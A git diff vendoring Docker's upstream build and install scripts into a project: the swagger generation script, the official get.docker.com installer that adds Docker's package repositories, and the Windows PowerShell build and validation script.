+ EOH + echo + git log --format='%aN <%aE>' | LC_ALL=C.UTF-8 sort -uf +} > AUTHORS diff --git a/vendor/github.com/docker/docker/hack/generate-swagger-api.sh b/vendor/github.com/docker/docker/hack/generate-swagger-api.sh new file mode 100755 index 0000000000..a8e9f818a7 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/generate-swagger-api.sh @@ -0,0 +1,22 @@ +#!/bin/sh +set -eu + +swagger generate model -f api/swagger.yaml \ + -t api -m types --skip-validator -C api/swagger-gen.yaml \ + -n Volume \ + -n Port \ + -n ImageSummary \ + -n Plugin -n PluginDevice -n PluginMount -n PluginEnv -n PluginInterfaceType \ + -n ErrorResponse \ + -n IdResponse \ + -n ServiceUpdateResponse + +swagger generate operation -f api/swagger.yaml \ + -t api -a types -m types -C api/swagger-gen.yaml \ + -T api/templates --skip-responses --skip-parameters --skip-validator \ + -n VolumesList \ + -n VolumesCreate \ + -n ContainerCreate \ + -n ContainerUpdate \ + -n Authenticate \ + -n ContainerWait diff --git a/vendor/github.com/docker/docker/hack/install.sh b/vendor/github.com/docker/docker/hack/install.sh new file mode 100644 index 0000000000..cc20d69396 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/install.sh @@ -0,0 +1,484 @@ +#!/bin/sh +set -e +# +# This script is meant for quick & easy install via: +# 'curl -sSL https://get.docker.com/ | sh' +# or: +# 'wget -qO- https://get.docker.com/ | sh' +# +# For test builds (ie. 
release candidates): +# 'curl -fsSL https://test.docker.com/ | sh' +# or: +# 'wget -qO- https://test.docker.com/ | sh' +# +# For experimental builds: +# 'curl -fsSL https://experimental.docker.com/ | sh' +# or: +# 'wget -qO- https://experimental.docker.com/ | sh' +# +# Docker Maintainers: +# To update this script on https://get.docker.com, +# use hack/release.sh during a normal release, +# or the following one-liner for script hotfixes: +# aws s3 cp --acl public-read hack/install.sh s3://get.docker.com/index +# + +url="https://get.docker.com/" +apt_url="https://apt.dockerproject.org" +yum_url="https://yum.dockerproject.org" +gpg_fingerprint="58118E89F3A912897C070ADBF76221572C52609D" + +key_servers=" +ha.pool.sks-keyservers.net +pgp.mit.edu +keyserver.ubuntu.com +" + +mirror='' +while [ $# -gt 0 ]; do + case "$1" in + --mirror) + mirror="$2" + shift + ;; + *) + echo "Illegal option $1" + ;; + esac + shift $(( $# > 0 ? 1 : 0 )) +done + +case "$mirror" in + AzureChinaCloud) + apt_url="https://mirror.azure.cn/docker-engine/apt" + yum_url="https://mirror.azure.cn/docker-engine/yum" + ;; +esac + +command_exists() { + command -v "$@" > /dev/null 2>&1 +} + +echo_docker_as_nonroot() { + if command_exists docker && [ -e /var/run/docker.sock ]; then + ( + set -x + $sh_c 'docker version' + ) || true + fi + your_user=your-user + [ "$user" != 'root' ] && your_user="$user" + # intentionally mixed spaces and tabs here -- tabs are stripped by "<<-EOF", spaces are kept in the output + cat <<-EOF + + If you would like to use Docker as a non-root user, you should now consider + adding your user to the "docker" group with something like: + + sudo usermod -aG docker $your_user + + Remember that you will have to log out and back in for this to take effect! 
+ + EOF +} + +# Check if this is a forked Linux distro +check_forked() { + + # Check for lsb_release command existence, it usually exists in forked distros + if command_exists lsb_release; then + # Check if the `-u` option is supported + set +e + lsb_release -a -u > /dev/null 2>&1 + lsb_release_exit_code=$? + set -e + + # Check if the command has exited successfully, it means we're in a forked distro + if [ "$lsb_release_exit_code" = "0" ]; then + # Print info about current distro + cat <<-EOF + You're using '$lsb_dist' version '$dist_version'. + EOF + + # Get the upstream release info + lsb_dist=$(lsb_release -a -u 2>&1 | tr '[:upper:]' '[:lower:]' | grep -E 'id' | cut -d ':' -f 2 | tr -d '[[:space:]]') + dist_version=$(lsb_release -a -u 2>&1 | tr '[:upper:]' '[:lower:]' | grep -E 'codename' | cut -d ':' -f 2 | tr -d '[[:space:]]') + + # Print info about upstream distro + cat <<-EOF + Upstream release is '$lsb_dist' version '$dist_version'. + EOF + else + if [ -r /etc/debian_version ] && [ "$lsb_dist" != "ubuntu" ] && [ "$lsb_dist" != "raspbian" ]; then + # We're Debian and don't even know it! 
+ lsb_dist=debian + dist_version="$(cat /etc/debian_version | sed 's/\/.*//' | sed 's/\..*//')" + case "$dist_version" in + 9) + dist_version="stretch" + ;; + 8|'Kali Linux 2') + dist_version="jessie" + ;; + 7) + dist_version="wheezy" + ;; + esac + fi + fi + fi +} + +rpm_import_repository_key() { + local key=$1; shift + local tmpdir=$(mktemp -d) + chmod 600 "$tmpdir" + for key_server in $key_servers ; do + gpg --homedir "$tmpdir" --keyserver "$key_server" --recv-keys "$key" && break + done + gpg --homedir "$tmpdir" -k "$key" >/dev/null + gpg --homedir "$tmpdir" --export --armor "$key" > "$tmpdir"/repo.key + rpm --import "$tmpdir"/repo.key + rm -rf "$tmpdir" +} + +semverParse() { + major="${1%%.*}" + minor="${1#$major.}" + minor="${minor%%.*}" + patch="${1#$major.$minor.}" + patch="${patch%%[-.]*}" +} + +do_install() { + architecture=$(uname -m) + case $architecture in + # officially supported + amd64|x86_64) + ;; + # unofficially supported with available repositories + armv6l|armv7l) + ;; + # unofficially supported without available repositories + aarch64|arm64|ppc64le|s390x) + cat 1>&2 <<-EOF + Error: Docker doesn't officially support $architecture and no Docker $architecture repository exists. + EOF + exit 1 + ;; + # not supported + *) + cat >&2 <<-EOF + Error: $architecture is not a recognized platform. + EOF + exit 1 + ;; + esac + + if command_exists docker; then + version="$(docker -v | cut -d ' ' -f3 | cut -d ',' -f1)" + MAJOR_W=1 + MINOR_W=10 + + semverParse $version + + shouldWarn=0 + if [ $major -lt $MAJOR_W ]; then + shouldWarn=1 + fi + + if [ $major -le $MAJOR_W ] && [ $minor -lt $MINOR_W ]; then + shouldWarn=1 + fi + + cat >&2 <<-'EOF' + Warning: the "docker" command appears to already exist on this system. + + If you already have Docker installed, this script can cause trouble, which is + why we're displaying this warning and provide the opportunity to cancel the + installation. 
+ + If you installed the current Docker package using this script and are using it + EOF + + if [ $shouldWarn -eq 1 ]; then + cat >&2 <<-'EOF' + again to update Docker, we urge you to migrate your image store before upgrading + to v1.10+. + + You can find instructions for this here: + https://github.com/docker/docker/wiki/Engine-v1.10.0-content-addressability-migration + EOF + else + cat >&2 <<-'EOF' + again to update Docker, you can safely ignore this message. + EOF + fi + + cat >&2 <<-'EOF' + + You may press Ctrl+C now to abort this script. + EOF + ( set -x; sleep 20 ) + fi + + user="$(id -un 2>/dev/null || true)" + + sh_c='sh -c' + if [ "$user" != 'root' ]; then + if command_exists sudo; then + sh_c='sudo -E sh -c' + elif command_exists su; then + sh_c='su -c' + else + cat >&2 <<-'EOF' + Error: this installer needs the ability to run commands as root. + We are unable to find either "sudo" or "su" available to make this happen. + EOF + exit 1 + fi + fi + + curl='' + if command_exists curl; then + curl='curl -sSL' + elif command_exists wget; then + curl='wget -qO-' + elif command_exists busybox && busybox --list-modules | grep -q wget; then + curl='busybox wget -qO-' + fi + + # check to see which repo they are trying to install from + if [ -z "$repo" ]; then + repo='main' + if [ "https://test.docker.com/" = "$url" ]; then + repo='testing' + elif [ "https://experimental.docker.com/" = "$url" ]; then + repo='experimental' + fi + fi + + # perform some very rudimentary platform detection + lsb_dist='' + dist_version='' + if command_exists lsb_release; then + lsb_dist="$(lsb_release -si)" + fi + if [ -z "$lsb_dist" ] && [ -r /etc/lsb-release ]; then + lsb_dist="$(. 
/etc/lsb-release && echo "$DISTRIB_ID")" + fi + if [ -z "$lsb_dist" ] && [ -r /etc/debian_version ]; then + lsb_dist='debian' + fi + if [ -z "$lsb_dist" ] && [ -r /etc/fedora-release ]; then + lsb_dist='fedora' + fi + if [ -z "$lsb_dist" ] && [ -r /etc/oracle-release ]; then + lsb_dist='oracleserver' + fi + if [ -z "$lsb_dist" ] && [ -r /etc/centos-release ]; then + lsb_dist='centos' + fi + if [ -z "$lsb_dist" ] && [ -r /etc/redhat-release ]; then + lsb_dist='redhat' + fi + if [ -z "$lsb_dist" ] && [ -r /etc/photon-release ]; then + lsb_dist='photon' + fi + if [ -z "$lsb_dist" ] && [ -r /etc/os-release ]; then + lsb_dist="$(. /etc/os-release && echo "$ID")" + fi + + lsb_dist="$(echo "$lsb_dist" | tr '[:upper:]' '[:lower:]')" + + # Special case redhatenterpriseserver + if [ "${lsb_dist}" = "redhatenterpriseserver" ]; then + # Set it to redhat, it will be changed to centos below anyways + lsb_dist='redhat' + fi + + case "$lsb_dist" in + + ubuntu) + if command_exists lsb_release; then + dist_version="$(lsb_release --codename | cut -f2)" + fi + if [ -z "$dist_version" ] && [ -r /etc/lsb-release ]; then + dist_version="$(. /etc/lsb-release && echo "$DISTRIB_CODENAME")" + fi + ;; + + debian|raspbian) + dist_version="$(cat /etc/debian_version | sed 's/\/.*//' | sed 's/\..*//')" + case "$dist_version" in + 8) + dist_version="jessie" + ;; + 7) + dist_version="wheezy" + ;; + esac + ;; + + oracleserver) + # need to switch lsb_dist to match yum repo URL + lsb_dist="oraclelinux" + dist_version="$(rpm -q --whatprovides redhat-release --queryformat "%{VERSION}\n" | sed 's/\/.*//' | sed 's/\..*//' | sed 's/Server*//')" + ;; + + fedora|centos|redhat) + dist_version="$(rpm -q --whatprovides ${lsb_dist}-release --queryformat "%{VERSION}\n" | sed 's/\/.*//' | sed 's/\..*//' | sed 's/Server*//' | sort | tail -1)" + ;; + + "vmware photon") + lsb_dist="photon" + dist_version="$(. 
/etc/os-release && echo "$VERSION_ID")" + ;; + + *) + if command_exists lsb_release; then + dist_version="$(lsb_release --codename | cut -f2)" + fi + if [ -z "$dist_version" ] && [ -r /etc/os-release ]; then + dist_version="$(. /etc/os-release && echo "$VERSION_ID")" + fi + ;; + + + esac + + # Check if this is a forked Linux distro + check_forked + + # Run setup for each distro accordingly + case "$lsb_dist" in + ubuntu|debian|raspbian) + export DEBIAN_FRONTEND=noninteractive + + did_apt_get_update= + apt_get_update() { + if [ -z "$did_apt_get_update" ]; then + ( set -x; $sh_c 'sleep 3; apt-get update' ) + did_apt_get_update=1 + fi + } + + if [ "$lsb_dist" != "raspbian" ]; then + # aufs is preferred over devicemapper; try to ensure the driver is available. + if ! grep -q aufs /proc/filesystems && ! $sh_c 'modprobe aufs'; then + if uname -r | grep -q -- '-generic' && dpkg -l 'linux-image-*-generic' | grep -qE '^ii|^hi' 2>/dev/null; then + kern_extras="linux-image-extra-$(uname -r) linux-image-extra-virtual" + + apt_get_update + ( set -x; $sh_c 'sleep 3; apt-get install -y -q '"$kern_extras" ) || true + + if ! grep -q aufs /proc/filesystems && ! $sh_c 'modprobe aufs'; then + echo >&2 'Warning: tried to install '"$kern_extras"' (for AUFS)' + echo >&2 ' but we still have no AUFS. Docker may not work. Proceeding anyways!' + ( set -x; sleep 10 ) + fi + else + echo >&2 'Warning: current kernel is not supported by the linux-image-extra-virtual' + echo >&2 ' package. We have no AUFS support. Consider installing the packages' + echo >&2 ' linux-image-virtual kernel and linux-image-extra-virtual for AUFS support.' 
+ ( set -x; sleep 10 ) + fi + fi + fi + + # install apparmor utils if they're missing and apparmor is enabled in the kernel + # otherwise Docker will fail to start + if [ "$(cat /sys/module/apparmor/parameters/enabled 2>/dev/null)" = 'Y' ]; then + if command -v apparmor_parser >/dev/null 2>&1; then + echo 'apparmor is enabled in the kernel and apparmor utils were already installed' + else + echo 'apparmor is enabled in the kernel, but apparmor_parser is missing. Trying to install it..' + apt_get_update + ( set -x; $sh_c 'sleep 3; apt-get install -y -q apparmor' ) + fi + fi + + if [ ! -e /usr/lib/apt/methods/https ]; then + apt_get_update + ( set -x; $sh_c 'sleep 3; apt-get install -y -q apt-transport-https ca-certificates' ) + fi + if [ -z "$curl" ]; then + apt_get_update + ( set -x; $sh_c 'sleep 3; apt-get install -y -q curl ca-certificates' ) + curl='curl -sSL' + fi + if ! command -v gpg > /dev/null; then + apt_get_update + ( set -x; $sh_c 'sleep 3; apt-get install -y -q gnupg2 || apt-get install -y -q gnupg' ) + fi + + # dirmngr is a separate package in ubuntu yakkety; see https://bugs.launchpad.net/ubuntu/+source/apt/+bug/1634464 + if ! 
command -v dirmngr > /dev/null; then + apt_get_update + ( set -x; $sh_c 'sleep 3; apt-get install -y -q dirmngr' ) + fi + + ( + set -x + for key_server in $key_servers ; do + $sh_c "apt-key adv --keyserver hkp://${key_server}:80 --recv-keys ${gpg_fingerprint}" && break + done + $sh_c "apt-key adv -k ${gpg_fingerprint} >/dev/null" + $sh_c "mkdir -p /etc/apt/sources.list.d" + $sh_c "echo deb \[arch=$(dpkg --print-architecture)\] ${apt_url}/repo ${lsb_dist}-${dist_version} ${repo} > /etc/apt/sources.list.d/docker.list" + $sh_c 'sleep 3; apt-get update; apt-get install -y -q docker-engine' + ) + echo_docker_as_nonroot + exit 0 + ;; + + fedora|centos|redhat|oraclelinux|photon) + if [ "${lsb_dist}" = "redhat" ]; then + # we use the centos repository for both redhat and centos releases + lsb_dist='centos' + fi + $sh_c "cat >/etc/yum.repos.d/docker-${repo}.repo" <<-EOF + [docker-${repo}-repo] + name=Docker ${repo} Repository + baseurl=${yum_url}/repo/${repo}/${lsb_dist}/${dist_version} + enabled=1 + gpgcheck=1 + gpgkey=${yum_url}/gpg + EOF + if [ "$lsb_dist" = "fedora" ] && [ "$dist_version" -ge "22" ]; then + ( + set -x + $sh_c 'sleep 3; dnf -y -q install docker-engine' + ) + elif [ "$lsb_dist" = "photon" ]; then + ( + set -x + $sh_c 'sleep 3; tdnf -y install docker-engine' + ) + else + ( + set -x + $sh_c 'sleep 3; yum -y -q install docker-engine' + ) + fi + echo_docker_as_nonroot + exit 0 + ;; + esac + + # intentionally mixed spaces and tabs here -- tabs are stripped by "<<-'EOF'", spaces are kept in the output + cat >&2 <<-'EOF' + + Either your platform is not easily detectable, is not supported by this + installer script (yet - PRs welcome! [hack/install.sh]), or does not yet have + a package for Docker. 
Please visit the following URL for more detailed + installation instructions: + + https://docs.docker.com/engine/installation/ + + EOF + exit 1 +} + +# wrapped up in a function so that we have some protection against only getting +# half the file during "curl | sh" +do_install diff --git a/vendor/github.com/docker/docker/hack/make.ps1 b/vendor/github.com/docker/docker/hack/make.ps1 new file mode 100644 index 0000000000..14b9603b2e --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make.ps1 @@ -0,0 +1,408 @@ +<# +.NOTES + Author: @jhowardmsft + + Summary: Windows native build script. This is similar to functionality provided + by hack\make.sh, but uses native Windows PowerShell semantics. It does + not support the full set of options provided by the Linux counterpart. + For example: + + - You can't cross-build Linux docker binaries on Windows + - Hashes aren't generated on binaries + - 'Releasing' isn't supported. + - Integration tests. This is because they currently cannot run inside a container, + and require significant external setup. + + It does however provided the minimum necessary to support parts of local Windows + development and Windows to Windows CI. + + Usage Examples (run from repo root): + "hack\make.ps1 -Binary" to build the binaries + "hack\make.ps1 -Client" to build just the client 64-bit binary + "hack\make.ps1 -TestUnit" to run unit tests + "hack\make.ps1 -Binary -TestUnit" to build the binaries and run unit tests + "hack\make.ps1 -All" to run everything this script knows about + +.PARAMETER Client + Builds the client binaries. + +.PARAMETER Daemon + Builds the daemon binary. + +.PARAMETER Binary + Builds the client binaries and the daemon binary. A convenient shortcut to `make.ps1 -Client -Daemon`. + +.PARAMETER Race + Use -race in go build and go test. + +.PARAMETER Noisy + Use -v in go build. + +.PARAMETER ForceBuildAll + Use -a in go build. 
+ +.PARAMETER NoOpt + Use -gcflags -N -l in go build to disable optimisation (can aide debugging). + +.PARAMETER CommitSuffix + Adds a custom string to be appended to the commit ID (spaces are stripped). + +.PARAMETER DCO + Runs the DCO (Developer Certificate Of Origin) test. + +.PARAMETER PkgImports + Runs the pkg\ directory imports test. + +.PARAMETER GoFormat + Runs the Go formatting test. + +.PARAMETER TestUnit + Runs unit tests. + +.PARAMETER All + Runs everything this script knows about. + + +TODO +- Unify the head commit +- Sort out the GITCOMMIT environment variable in the absense of a .git (longer term) +- Add golint and other checks (swagger maybe?) + +#> + + +param( + [Parameter(Mandatory=$False)][switch]$Client, + [Parameter(Mandatory=$False)][switch]$Daemon, + [Parameter(Mandatory=$False)][switch]$Binary, + [Parameter(Mandatory=$False)][switch]$Race, + [Parameter(Mandatory=$False)][switch]$Noisy, + [Parameter(Mandatory=$False)][switch]$ForceBuildAll, + [Parameter(Mandatory=$False)][switch]$NoOpt, + [Parameter(Mandatory=$False)][string]$CommitSuffix="", + [Parameter(Mandatory=$False)][switch]$DCO, + [Parameter(Mandatory=$False)][switch]$PkgImports, + [Parameter(Mandatory=$False)][switch]$GoFormat, + [Parameter(Mandatory=$False)][switch]$TestUnit, + [Parameter(Mandatory=$False)][switch]$All +) + +$ErrorActionPreference = "Stop" +$pushed=$False # To restore the directory if we have temporarily pushed to one. + +# Utility function to get the commit ID of the repository +Function Get-GitCommit() { + if (-not (Test-Path ".\.git")) { + # If we don't have a .git directory, but we do have the environment + # variable DOCKER_GITCOMMIT set, that can override it. + if ($env:DOCKER_GITCOMMIT.Length -eq 0) { + Throw ".git directory missing and DOCKER_GITCOMMIT environment variable not specified." 
+ } + Write-Host "INFO: Git commit assumed from DOCKER_GITCOMMIT environment variable" + return $env:DOCKER_GITCOMMIT + } + $gitCommit=$(git rev-parse --short HEAD) + if ($(git status --porcelain --untracked-files=no).Length -ne 0) { + $gitCommit="$gitCommit-unsupported" + Write-Host "" + Write-Warning "This version is unsupported because there are uncommitted file(s)." + Write-Warning "Either commit these changes, or add them to .gitignore." + git status --porcelain --untracked-files=no | Write-Warning + Write-Host "" + } + return $gitCommit +} + +# Utility function to get get the current build version of docker +Function Get-DockerVersion() { + if (-not (Test-Path ".\VERSION")) { Throw "VERSION file not found. Is this running from the root of a docker repository?" } + return $(Get-Content ".\VERSION" -raw).ToString().Replace("`n","").Trim() +} + +# Utility function to determine if we are running in a container or not. +# In Windows, we get this through an environment variable set in `Dockerfile.Windows` +Function Check-InContainer() { + if ($env:FROM_DOCKERFILE.Length -eq 0) { + Write-Host "" + Write-Warning "Not running in a container. The result might be an incorrect build." 
+ Write-Host "" + } +} + +# Utility function to get the commit for HEAD +Function Get-HeadCommit() { + $head = Invoke-Expression "git rev-parse --verify HEAD" + if ($LASTEXITCODE -ne 0) { Throw "Failed getting HEAD commit" } + + return $head +} + +# Utility function to get the commit for upstream +Function Get-UpstreamCommit() { + Invoke-Expression "git fetch -q https://github.com/docker/docker.git refs/heads/master" + if ($LASTEXITCODE -ne 0) { Throw "Failed fetching" } + + $upstream = Invoke-Expression "git rev-parse --verify FETCH_HEAD" + if ($LASTEXITCODE -ne 0) { Throw "Failed getting upstream commit" } + + return $upstream +} + +# Build a binary (client or daemon) +Function Execute-Build($type, $additionalBuildTags, $directory) { + # Generate the build flags + $buildTags = "autogen" + if ($Noisy) { $verboseParm=" -v" } + if ($Race) { Write-Warning "Using race detector"; $raceParm=" -race"} + if ($ForceBuildAll) { $allParm=" -a" } + if ($NoOpt) { $optParm=" -gcflags "+""""+"-N -l"+"""" } + if ($addtionalBuildTags -ne "") { $buildTags += $(" " + $additionalBuildTags) } + + # Do the go build in the appropriate directory + # Note -linkmode=internal is required to be able to debug on Windows. + # https://github.com/golang/go/issues/14319#issuecomment-189576638 + Write-Host "INFO: Building $type..." + Push-Location $root\cmd\$directory; $global:pushed=$True + $buildCommand = "go build" + ` + $raceParm + ` + $verboseParm + ` + $allParm + ` + $optParm + ` + " -tags """ + $buildTags + """" + ` + " -ldflags """ + "-linkmode=internal" + """" + ` + " -o $root\bundles\"+$directory+".exe" + Invoke-Expression $buildCommand + if ($LASTEXITCODE -ne 0) { Throw "Failed to compile $type" } + Pop-Location; $global:pushed=$False +} + + +# Validates the DCO marker is present on each commit +Function Validate-DCO($headCommit, $upstreamCommit) { + Write-Host "INFO: Validating Developer Certificate of Origin..." 
+ # Username may only contain alphanumeric characters or dashes and cannot begin with a dash + $usernameRegex='[a-zA-Z0-9][a-zA-Z0-9-]+' + + $dcoPrefix="Signed-off-by:" + $dcoRegex="^(Docker-DCO-1.1-)?$dcoPrefix ([^<]+) <([^<>@]+@[^<>]+)>( \\(github: ($usernameRegex)\\))?$" + + $counts = Invoke-Expression "git diff --numstat $upstreamCommit...$headCommit" + if ($LASTEXITCODE -ne 0) { Throw "Failed git diff --numstat" } + + # Counts of adds and deletes after removing multiple white spaces. AWK anyone? :( + $adds=0; $dels=0; $($counts -replace '\s+', ' ') | %{ + $a=$_.Split(" "); + if ($a[0] -ne "-") { $adds+=[int]$a[0] } + if ($a[1] -ne "-") { $dels+=[int]$a[1] } + } + if (($adds -eq 0) -and ($dels -eq 0)) { + Write-Warning "DCO validation - nothing to validate!" + return + } + + $commits = Invoke-Expression "git log $upstreamCommit..$headCommit --format=format:%H%n" + if ($LASTEXITCODE -ne 0) { Throw "Failed git log --format" } + $commits = $($commits -split '\s+' -match '\S') + $badCommits=@() + $commits | %{ + # Skip commits with no content such as merge commits etc + if ($(git log -1 --format=format: --name-status $_).Length -gt 0) { + # Ignore exit code on next call - always process regardless + $commitMessage = Invoke-Expression "git log -1 --format=format:%B --name-status $_" + if (($commitMessage -match $dcoRegex).Length -eq 0) { $badCommits+=$_ } + } + } + if ($badCommits.Length -eq 0) { + Write-Host "Congratulations! All commits are properly signed with the DCO!" + } else { + $e = "`nThese commits do not have a proper '$dcoPrefix' marker:`n" + $badCommits | %{ $e+=" - $_`n"} + $e += "`nPlease amend each commit to include a properly formatted DCO marker.`n`n" + $e += "Visit the following URL for information about the Docker DCO:`n" + $e += "https://github.com/docker/docker/blob/master/CONTRIBUTING.md#sign-your-work`n" + Throw $e + } +} + +# Validates that .\pkg\... 
is safely isolated from internal code +Function Validate-PkgImports($headCommit, $upstreamCommit) { + Write-Host "INFO: Validating pkg import isolation..." + + # Get a list of go source-code files which have changed under pkg\. Ignore exit code on next call - always process regardless + $files=@(); $files = Invoke-Expression "git diff $upstreamCommit...$headCommit --diff-filter=ACMR --name-only -- `'pkg\*.go`'" + $badFiles=@(); $files | %{ + $file=$_ + # For the current changed file, get its list of dependencies, sorted and uniqued. + $imports = Invoke-Expression "go list -e -f `'{{ .Deps }}`' $file" + if ($LASTEXITCODE -ne 0) { Throw "Failed go list for dependencies on $file" } + $imports = $imports -Replace "\[" -Replace "\]", "" -Split(" ") | Sort-Object | Get-Unique + # Filter out what we are looking for + $imports = $imports -NotMatch "^github.com/docker/docker/pkg/" ` + -NotMatch "^github.com/docker/docker/vendor" ` + -Match "^github.com/docker/docker" ` + -Replace "`n", "" + $imports | % { $badFiles+="$file imports $_`n" } + } + if ($badFiles.Length -eq 0) { + Write-Host 'Congratulations! ".\pkg\*.go" is safely isolated from internal code.' + } else { + $e = "`nThese files import internal code: (either directly or indirectly)`n" + $badFiles | %{ $e+=" - $_"} + Throw $e + } +} + +# Validates that changed files are correctly go-formatted +Function Validate-GoFormat($headCommit, $upstreamCommit) { + Write-Host "INFO: Validating go formatting on changed files..." + + # Verify gofmt is installed + if ($(Get-Command gofmt -ErrorAction SilentlyContinue) -eq $nil) { Throw "gofmt does not appear to be installed" } + + # Get a list of all go source-code files which have changed. 
Ignore exit code on next call - always process regardless + $files=@(); $files = Invoke-Expression "git diff $upstreamCommit...$headCommit --diff-filter=ACMR --name-only -- `'*.go`'" + $files = $files | Select-String -NotMatch "^vendor/" | Select-String -NotMatch "^cli/compose/schema/bindata.go" + $badFiles=@(); $files | %{ + # Deliberately ignore error on next line - treat as failed + $content=Invoke-Expression "git show $headCommit`:$_" + + # Next set of hoops are to ensure we have LF not CRLF semantics as otherwise gofmt on Windows will not succeed. + # Also note that gofmt on Windows does not appear to support stdin piping correctly. Hence go through a temporary file. + $content=$content -join "`n" + $content+="`n" + $outputFile=[System.IO.Path]::GetTempFileName() + if (Test-Path $outputFile) { Remove-Item $outputFile } + [System.IO.File]::WriteAllText($outputFile, $content, (New-Object System.Text.UTF8Encoding($False))) + $valid=Invoke-Expression "gofmt -s -l $outputFile" + Write-Host "Checking $outputFile" + if ($valid.Length -ne 0) { $badFiles+=$_ } + if (Test-Path $outputFile) { Remove-Item $outputFile } + } + if ($badFiles.Length -eq 0) { + Write-Host 'Congratulations! All Go source files are properly formatted.' + } else { + $e = "`nThese files are not properly gofmt`'d:`n" + $badFiles | %{ $e+=" - $_`n"} + $e+= "`nPlease reformat the above files using `"gofmt -s -w`" and commit the result." + Throw $e + } +} + +# Run the unit tests +Function Run-UnitTests() { + Write-Host "INFO: Running unit tests..." + $testPath="./..." 
+ $goListCommand = "go list -e -f '{{if ne .Name """ + '\"github.com/docker/docker\"' + """}}{{.ImportPath}}{{end}}' $testPath" + $pkgList = $(Invoke-Expression $goListCommand) + if ($LASTEXITCODE -ne 0) { Throw "go list for unit tests failed" } + $pkgList = $pkgList | Select-String -Pattern "github.com/docker/docker" + $pkgList = $pkgList | Select-String -NotMatch "github.com/docker/docker/vendor" + $pkgList = $pkgList | Select-String -NotMatch "github.com/docker/docker/man" + $pkgList = $pkgList | Select-String -NotMatch "github.com/docker/docker/integration-cli" + $pkgList = $pkgList -replace "`r`n", " " + $goTestCommand = "go test" + $raceParm + " -cover -ldflags -w -tags """ + "autogen daemon" + """ -a """ + "-test.timeout=10m" + """ $pkgList" + Invoke-Expression $goTestCommand + if ($LASTEXITCODE -ne 0) { Throw "Unit tests failed" } +} + +# Start of main code. +Try { + Write-Host -ForegroundColor Cyan "INFO: make.ps1 starting at $(Get-Date)" + $root=$(pwd) + + # Handle the "-All" shortcut to turn on all things we can handle. + if ($All) { $Client=$True; $Daemon=$True; $DCO=$True; $PkgImports=$True; $GoFormat=$True; $TestUnit=$True } + + # Handle the "-Binary" shortcut to build both client and daemon. + if ($Binary) { $Client = $True; $Daemon = $True } + + # Make sure we have something to do + if (-not($Client) -and -not($Daemon) -and -not($DCO) -and -not($PkgImports) -and -not($GoFormat) -and -not($TestUnit)) { Throw 'Nothing to do. Try adding "-All" for everything I can do' } + + # Verify git is installed + if ($(Get-Command git -ErrorAction SilentlyContinue) -eq $nil) { Throw "Git does not appear to be installed" } + + # Verify go is installed + if ($(Get-Command go -ErrorAction SilentlyContinue) -eq $nil) { Throw "GoLang does not appear to be installed" } + + # Get the git commit. This will also verify if we are in a repo or not. Then add a custom string if supplied. 
+ $gitCommit=Get-GitCommit + if ($CommitSuffix -ne "") { $gitCommit += "-"+$CommitSuffix -Replace ' ', '' } + + # Get the version of docker (eg 1.14.0-dev) + $dockerVersion=Get-DockerVersion + + # Give a warning if we are not running in a container and are building binaries or running unit tests. + # Not relevant for validation tests as these are fine to run outside of a container. + if ($Client -or $Daemon -or $TestUnit) { Check-InContainer } + + # Verify GOPATH is set + if ($env:GOPATH.Length -eq 0) { Throw "Missing GOPATH environment variable. See https://golang.org/doc/code.html#GOPATH" } + + # Run autogen if building binaries or running unit tests. + if ($Client -or $Daemon -or $TestUnit) { + Write-Host "INFO: Invoking autogen..." + Try { .\hack\make\.go-autogen.ps1 -CommitString $gitCommit -DockerVersion $dockerVersion } + Catch [Exception] { Throw $_ } + } + + # DCO, Package import and Go formatting tests. + if ($DCO -or $PkgImports -or $GoFormat) { + # We need the head and upstream commits for these + $headCommit=Get-HeadCommit + $upstreamCommit=Get-UpstreamCommit + + # Run DCO validation + if ($DCO) { Validate-DCO $headCommit $upstreamCommit } + + # Run `gofmt` validation + if ($GoFormat) { Validate-GoFormat $headCommit $upstreamCommit } + + # Run pkg isolation validation + if ($PkgImports) { Validate-PkgImports $headCommit $upstreamCommit } + } + + # Build the binaries + if ($Client -or $Daemon) { + # Create the bundles directory if it doesn't exist + if (-not (Test-Path ".\bundles")) { New-Item ".\bundles" -ItemType Directory | Out-Null } + + # Perform the actual build + if ($Daemon) { Execute-Build "daemon" "daemon" "dockerd" } + if ($Client) { Execute-Build "client" "" "docker" } + } + + # Run unit tests + if ($TestUnit) { Run-UnitTests } + + # Gratuitous ASCII art. + if ($Daemon -or $Client) { + Write-Host + Write-Host -ForegroundColor Green " ________ ____ __." 
+ Write-Host -ForegroundColor Green " \_____ \ `| `|/ _`|" + Write-Host -ForegroundColor Green " / `| \`| `<" + Write-Host -ForegroundColor Green " / `| \ `| \" + Write-Host -ForegroundColor Green " \_______ /____`|__ \" + Write-Host -ForegroundColor Green " \/ \/" + Write-Host + } +} +Catch [Exception] { + Write-Host -ForegroundColor Red ("`nERROR: make.ps1 failed:`n$_") + + # More gratuitous ASCII art. + Write-Host + Write-Host -ForegroundColor Red "___________ .__.__ .___" + Write-Host -ForegroundColor Red "\_ _____/____ `|__`| `| ____ __`| _/" + Write-Host -ForegroundColor Red " `| __) \__ \ `| `| `| _/ __ \ / __ `| " + Write-Host -ForegroundColor Red " `| \ / __ \`| `| `|_\ ___// /_/ `| " + Write-Host -ForegroundColor Red " \___ / (____ /__`|____/\___ `>____ `| " + Write-Host -ForegroundColor Red " \/ \/ \/ \/ " + Write-Host + + Throw $_ +} +Finally { + if ($global:pushed) { Pop-Location } + Write-Host -ForegroundColor Cyan "INFO: make.ps1 ended at $(Get-Date)" +} diff --git a/vendor/github.com/docker/docker/hack/make.sh b/vendor/github.com/docker/docker/hack/make.sh new file mode 100755 index 0000000000..f0e482feda --- /dev/null +++ b/vendor/github.com/docker/docker/hack/make.sh @@ -0,0 +1,304 @@ +#!/usr/bin/env bash +set -e + +# This script builds various binary artifacts from a checkout of the docker +# source code. +# +# Requirements: +# - The current directory should be a checkout of the docker source code +# (https://github.com/docker/docker). Whatever version is checked out +# will be built. +# - The VERSION file, at the root of the repository, should exist, and +# will be used as Docker binary version and package version. +# - The hash of the git commit will also be included in the Docker binary, +# with the suffix -unsupported if the repository isn't clean. +# - The script is intended to be run inside the docker container specified +# in the Dockerfile at the root of the source. In other words: +# DO NOT CALL THIS SCRIPT DIRECTLY. 
